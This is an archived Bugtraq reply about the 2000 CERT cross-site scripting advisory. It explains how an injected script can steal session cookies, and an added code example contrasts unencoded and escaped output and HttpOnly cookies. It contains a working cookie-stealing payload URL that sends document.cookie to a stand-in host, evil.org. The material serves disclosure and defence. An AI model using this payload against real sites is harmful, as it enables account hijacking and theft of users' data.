Bugtraq mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: metal_hurlant () YAHOO COM (Henri Torgemane)
Date: Thu, 3 Feb 2000 14:22:38 -0800
First, what the CERT describes isn't one of the many implementation bugs we've seen before, like bugs crashing the browser or giving access to local resources: This is a design problem.

One obvious abuse could be to compromise online accounts: Many sites use cookies to avoid asking for a username/password on every page of their site. As a result, cookies are often equivalent to passwords.

Interestingly, JavaScript can access cookies on the domain from which the script has been loaded. Say, if your site uses cookies as a means of authentication and has test-cgi installed, you can get your user's cookies grabbed with a URL like:

http://yoursite.com/cgi-bin/test-cgi?a=<script>(new Image).src="http://evil.org/?"+escape(document.cookie)</script>

Each time a user of your site happens to follow that URL, the log of the evil.org web server will contain the cookies for his account.

In other cases, rather than actually taking the cookie, one can instead choose to "remote-control" the browser, making it take actions to modify the user account or grab some personal information (e-mail messages on a webmail system, for example) without the user having a chance to see what's going on.

Hope it helps,
Henri Torgemane

Shockro () aol com wrote:
I'm curious as to how this could be used in a malicious manner, as opposed to just being an annoyance. I mean, god forbid, people should execute arbitrary javascript on us. Yes, we've all seen the file upload form exploit and the 1001 ways to crash Internet Explorer through infinite loops, but there's nothing seriously harmful about this, am I right? Please correct me if I'm wrong.

Shockro
Support DeCSS
Support Reverse Engineering
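
Added example (not part of the original message or of test-cgi itself): a simplified model of a script that echoes the query parameter "a" into an HTML page, shown unencoded and then with output encoding, plus a session cookie marked HttpOnly so that document.cookie cannot read it. All function names and the cookie name "sid" are hypothetical; the sample query string is the one quoted in the message above.

```javascript
// Sample input: the query string from the URL quoted in the message.
const SAMPLE_QUERY =
  'a=<script>(new Image).src="http://evil.org/?"+escape(document.cookie)</script>';

// Encode the characters that let text break out of HTML content or attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read parameter "a" from a raw query string, as an echoing CGI would.
function getParamA(rawQuery) {
  return new URLSearchParams(rawQuery).get('a') ?? '';
}

// Unsafe echo: the parameter lands in the page as markup, so the browser
// runs it with access to the cookies of the echoing site.
function renderVulnerable(rawQuery) {
  return `<html><body><pre>a = ${getParamA(rawQuery)}</pre></body></html>`;
}

// Safe echo: the same value is encoded on output and displayed as text.
function renderHardened(rawQuery) {
  return `<html><body><pre>a = ${escapeHtml(getParamA(rawQuery))}</pre></body></html>`;
}

// Simple check for review or tests: did a script element survive in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Session cookie header: HttpOnly hides the cookie from document.cookie,
// Secure and SameSite restrict when the browser sends it.
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

console.log('vulnerable output has script tag:', containsScriptTag(renderVulnerable(SAMPLE_QUERY)));
console.log('hardened output has script tag:  ', containsScriptTag(renderHardened(SAMPLE_QUERY)));
console.log(renderHardened(SAMPLE_QUERY));
console.log(sessionCookieHeader('constructed-session-id'));
```

HttpOnly only addresses the cookie-grabbing case; the "remote-control" case described in the message still requires that the echoed value is encoded on output.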